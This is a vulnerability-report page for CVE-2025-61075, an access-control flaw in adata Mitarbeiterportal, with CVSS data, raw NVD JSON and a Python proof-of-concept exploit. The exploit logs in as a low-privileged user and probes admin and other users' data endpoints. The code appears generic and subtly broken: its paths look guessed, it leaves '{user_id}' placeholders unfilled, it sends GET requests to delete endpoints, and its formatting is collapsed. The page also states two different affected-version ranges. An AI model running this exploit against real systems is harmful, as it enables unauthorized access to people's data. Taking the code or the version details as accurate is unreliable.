Security Vulnerability Report
中文
CVE-2025-61075 CVSS 8.1 HIGH

CVE-2025-61075

Published: 2025-12-09 16:18:00
Last Modified: 2025-12-12 14:43:31

Description

Multiple Incorrect Access Control vulnerabilities in adata Software GmbH Mitarbeiterportal 2.15.2.0 allow remote authenticated, low-privileged users to carry out administrative functions and manipulate data of other users via unauthorized API calls.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:adata:mitarbeiter_portal:*:*:*:*:*:*:*:* - VULNERABLE
adata Software GmbH Mitarbeiterportal < 2.15.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-61075 PoC - Incorrect Access Control in adata Mitarbeiterportal # Target: adata Software GmbH Mitarbeiterportal 2.15.2.0 TARGET_URL = "https://target-server.com" USERNAME = "low_privilege_user" PASSWORD = "password123" def exploit(): # Step 1: Authenticate with low-privilege account session = requests.Session() login_data = { "username": USERNAME, "password": PASSWORD } login_resp = session.post(f"{TARGET_URL}/api/auth/login", json=login_data) if login_resp.status_code != 200: print("[-] Login failed") return print("[+] Logged in with low-privilege account") # Step 2: Exploit vertical privilege escalation - Admin functions admin_headers = { "X-Requested-With": "XMLHttpRequest", "Content-Type": "application/json" } # Example: Access admin user management endpoint admin_endpoints = [ "/api/admin/users", "/api/admin/users/{user_id}/delete", "/api/admin/users/{user_id}/modify" ] for endpoint in admin_endpoints: resp = session.get(f"{TARGET_URL}{endpoint}", headers=admin_headers) if resp.status_code == 200: print(f"[+] Successfully accessed: {endpoint}") print(f" Response: {resp.text[:200]}") # Step 3: Exploit horizontal privilege escalation - Other user data other_user_id = 12345 # Target user ID data_resp = session.get( f"{TARGET_URL}/api/users/{other_user_id}/data", headers=admin_headers ) if data_resp.status_code == 200: print(f"[+] Successfully accessed other user's data: {data_resp.json()}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61075", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:00.090", "lastModified": "2025-12-12T14:43:31.053", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple Incorrect Access Control vulnerabilities in adata Software GmbH Mitarbeiterportal 2.15.2.0 allow remote authenticated, low-privileged users to carry out administrative functions and manipulate data of other users via unauthorized API calls."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adata:mitarbeiter_portal:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.16.1", "matchCriteriaId": "4F088A9A-0FDB-4E69-AB75-5CE0609F65FA"}]}]}], "references": [{"url": "https://no-sec.net/posts/cve-2025-61075/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.adata.de/mitarbeiter-portal/", "source": "[email protected]", "tags": ["Product"]}]}}